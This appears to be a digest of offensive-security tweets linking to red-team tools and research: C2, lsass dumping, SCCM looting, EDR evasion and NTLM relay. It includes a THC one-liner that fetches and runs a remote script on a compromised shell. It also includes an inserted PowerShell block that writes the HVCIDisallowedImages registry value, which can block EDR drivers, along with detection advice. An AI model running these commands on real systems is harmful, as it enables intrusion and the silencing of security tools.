[ SpecterOps @SpecterOps ]
Do you like BloodHound & PowerShell? Do you want to automate all things BloodHound?
Check out @SadProcessor's new blog post diving into a new PowerShell module he created, & instructions on how to get started
https://posts.specterops.io/bloodhound-operator-dog-whispering-reloaded-156020b7c5e9
https://github.com/SadProcessor/BloodHoundOperator
[ tweet ]
[ Cube0x0 @cube0x0 ]
Over a year ago, I left my position at WithSecure to start a new journey, create something new, and do my own thing. Today, I'm excited to publicly announce what I've been working on all this time.
Introducing 0xC2, a cross-platform C2 framework targeting Windows, Linux, and macOS environments:
https://0xc2.io
The first release was back in late 2023, initially only offered to a small circle of red teamers, and soon the registration will be open for new clients who provide threat simulation services.
All agents are written as PIC in C to provide better opsec and to allow operators to be more flexible when designing payloads. To make the agents modular and fully customizable, operators can create a user-defined virtual table that can be hooked by the agent. This can be used to change the default behavior of an agent or extend capabilities, from adding internal commands to implementing P2P protocols.
More details will be available soon.
[ tweet ]
Forwarded from Kaimi & d_x Blog
Exploiting a race condition in Telegram "tappers" (tap-to-earn mini apps)
https://kaimi.io/2024/08/exploit-race-condition-in-telegram-mini-apps/
Exploiting a race condition in "tappers" in Telegram Mini Apps (Blum, CalmMe and others) - Misc
[ Nic Losby @ DEFCON @Blurbdust ]
And a small update, generation is over halfway and will actually finish! A release of a torrent should be out before the end of the year!
[ tweet ][ reply ]
(about those very crack.sh rainbow tables 🏳️‍🌈)
[ Michael Schwarz @misc0110 ]
With the #GhostWrite CPU vulnerability, all isolation boundaries are broken - sandbox/container/VM can't prevent GhostWrite from writing and reading arbitrary physical memory on affected RISC-V CPUs. Deterministic, fast, and reliable - no side channels.
https://ghostwriteattack.com/
[ tweet ]
[ CCob @_EthicalChaos_ ]
Thanks to @_dirkjan for agreeing to share the stage with me for our talk on Windows Hello abuse. I have now made the repo public for those who want to have a play around with Shwmae. I promise, I'll get a README for it next week.
https://github.com/CCob/Shwmae
[ tweet ]
[ Orange Tsai @orange_8361 ]
Thrilled to release my latest research on Apache HTTP Server, revealing several architectural issues!
Highlights include:
- Escaping from DocumentRoot to System Root
- Bypassing built-in ACL/Auth with just a '?'
- Turning XSS into RCE with legacy code
https://blog.orange.tw/2024/08/confusion-attacks-en.html
[ tweet ]
[ Ricardo Ruiz @RicardoJoseRF ]
Last week I made public TrickDump, a tool to dump lsass using only NTAPIs without creating a Minidump file, generating instead 3 JSON and 1 ZIP file with the memory region dumps. Check it out here:
https://github.com/ricardojoserf/TrickDump
[ tweet ]
[ OtterHacker @OtterHacker ]
I've published my #defcon32 workshop!
If you want to develop your own "Perfect DLL Loader", you will have all you need in it. From the classic minimal loader to a fully featured one, this workshop in 6 steps is a journey inside the Windows internals!
https://github.com/OtterHacker/Conferences/tree/main/Defcon32
[ tweet ]
[ Bad Sector Labs @badsectorlabs ]
Dropped a new tool at DEF CON 32! Loot SCCM Distribution points via HTTP with
We've found credentials, certificates, custom apps, keystores, etc. What will you find?
https://github.com/badsectorlabs/sccm-http-looter
[ tweet ]
[ klez @KlezVirus ]
[RELEASE] Following the talk at DEF CON, I'm releasing all the POC projects associated with DriverJack. More info in the repos. For any additional info, hit me up ;)
https://github.com/klezVirus/DriverJack
https://github.com/klezVirus/RpcProxyInvoke
https://github.com/klezVirus/koppeling-p
[ tweet ]
[ Dirk-jan @_dirkjan ]
At Def Con I presented with @_EthicalChaos_ on new Windows Hello attacks. For ex: how to use the WinHello crypto keys from a low priv session to request a PRT on a different device, bypassing TPM protection of PRTs.
Slides:
https://dirkjanm.io/talks/
PoC:
https://github.com/dirkjanm/ROADtools/tree/master/winhello_assertion
[ tweet ]
[ The Hacker's Choice (@thc@infosec.exchange) @hackerschoice ]
RELEASE:
This should be the 1st command you execute on a remote shell 🧨
source <(curl -SsfL https://thc.org/hs)
Makes the BASH hack-ready. Lots of neat commands + apt-like static binary download ('bin nmap', ...).
LEAVES NO TRACE (memory only).
https://github.com/hackerschoice/hackshell
[ tweet ]
Offensive Xwitter
[ Daniel @0x64616e ] Lol, blocking the loading of EDR drivers with WDAC actually works. [ tweet ][ quote ]
[ Yarden Shafir @yarden_shafir ]
Another method that still works on most EDRs is the HVCIDisallowedImages reg key that blocks drivers by filename.
Can take multiple filenames, but requires HVCI to be enabled + reboot.
[ tweet ][ quote ]
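The two posts above describe blocking driver loads with a WDAC policy and with the HVCIDisallowedImages value. The PowerShell below is an added example, not code from either author or from any EDR vendor: it audits a host for that value (is HVCI actually running, is a kernel-mode WDAC policy enforced, which listed file names match an installed driver and whether that driver is currently loaded) and shows what the write side looks like, so both an operator and a detection engineer know what the change consists of. It assumes the value is a REG_MULTI_SZ under HKLM\SYSTEM\CurrentControlSet\Control\CI\Config (verify the path on your build); the function names and the driver file name in the usage comment are mine.

```powershell
# Added example (not from the original thread). Audits and writes the
# HVCIDisallowedImages block list. Assumption: the value is a REG_MULTI_SZ
# under HKLM\SYSTEM\CurrentControlSet\Control\CI\Config (verify on your build).
$CiConfigPath = 'HKLM:\SYSTEM\CurrentControlSet\Control\CI\Config'
$ValueName    = 'HVCIDisallowedImages'

function Get-VbsState {
    # Win32_DeviceGuard reports VBS status. In SecurityServicesRunning,
    # 2 = HVCI (memory integrity). CodeIntegrityPolicyEnforcementStatus is
    # the kernel-mode WDAC policy state: 0 = off, 1 = audit, 2 = enforced.
    $dg = Get-CimInstance -Namespace 'root\Microsoft\Windows\DeviceGuard' `
                          -ClassName Win32_DeviceGuard -ErrorAction SilentlyContinue
    [pscustomobject]@{
        HvciRunning    = [bool]($dg.SecurityServicesRunning -contains 2)
        HvciConfigured = [bool]($dg.SecurityServicesConfigured -contains 2)
        WdacKernelMode = $dg.CodeIntegrityPolicyEnforcementStatus
    }
}

function Get-HvciDisallowedImages {
    # One object per listed image, joined against installed kernel drivers so
    # you can see whether an entry targets something that is really on the box.
    $vbs     = Get-VbsState
    $listed  = (Get-ItemProperty -Path $CiConfigPath -Name $ValueName -ErrorAction SilentlyContinue).$ValueName
    $drivers = Get-CimInstance -ClassName Win32_SystemDriver

    foreach ($name in @($listed)) {
        if ([string]::IsNullOrWhiteSpace($name)) { continue }
        # PathName may carry a \??\ or \SystemRoot\ prefix; the block list matches
        # on file name only, so compare on the leaf.
        $match = $drivers | Where-Object { $_.PathName -and ((Split-Path $_.PathName -Leaf) -ieq $name) }
        [pscustomobject]@{
            BlockedImage      = $name
            Installed         = [bool]$match
            DriverService     = ($match.Name -join ',')
            CurrentlyLoaded   = [bool]($match | Where-Object State -eq 'Running')
            # The entry only bites with HVCI on, and only from the next boot.
            EffectiveNextBoot = [bool]$match -and $vbs.HvciRunning
        }
    }
}

function Add-HvciDisallowedImage {
    # Appends file names without clobbering existing entries. Needs admin;
    # takes effect only with HVCI enabled and after a reboot.
    param([Parameter(Mandatory)][string[]]$ImageName)
    $existing = @((Get-ItemProperty -Path $CiConfigPath -Name $ValueName -ErrorAction SilentlyContinue).$ValueName)
    $merged   = @($existing + $ImageName | Where-Object { $_ } | Sort-Object -Unique)
    if (-not (Test-Path $CiConfigPath)) { New-Item -Path $CiConfigPath -Force | Out-Null }
    Set-ItemProperty -Path $CiConfigPath -Name $ValueName -Type MultiString -Value $merged
    $merged
}

# Usage:
#   Get-VbsState
#   Get-HvciDisallowedImages | Format-Table
#   Add-HvciDisallowedImage -ImageName 'example_driver.sys'   # hypothetical file name
```

On the defensive side, the interesting artifact is the registry write itself: a Sysmon Event ID 13 (RegistryEvent, value set) on that path followed by a reboot is the sequence to alert on, and the audit function above lets you confirm afterwards whether any listed name corresponds to a security product driver that is installed but no longer loaded.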
[ Dazzy @dazzyddos ]
Wrote a blog post on abusing exclusions to evade AVs/EDR, which is stealthy, effective and an often overlooked topic.
https://medium.com/seercurity-spotlight/abusing-av-edr-exclusions-to-evade-detections-21fe31d7ed49
[ tweet ]
[ Logan Goins @shellph1sh ]
Created another write-up, this time on NTLM relay attacks to LDAP(S), including details of WebClient coercion, NTLM transport vulnerabilities, and finally device takeover after achieving authentication. You can read about it on my blog :)
https://logan-goins.com/2024-07-23-ldap-relay/
[ tweet ]
[ wei @XiaoWei___ ]
MSRC fixed an RCE bug in the TCPIP module.
I found the bug several months ago.
Its score is 9.8 and exploitation is more likely. Please apply the patch immediately.
[ tweet ]
[ Synacktiv @Synacktiv ]
In our latest blogpost, @croco_byte explores the inner workings of SCCM policies and introduces SCCMSecrets[.]py, a tool targeting secret policies in order to exploit misconfigurations, harvest credentials, and pivot across collections by impersonating legitimate clients.
https://www.synacktiv.com/publications/sccmsecretspy-exploiting-sccm-policies-distribution-for-credentials-harvesting-initial
[ tweet ]
[ @felixm_pw ]
How many of you are down the bottom?
[ tweet ]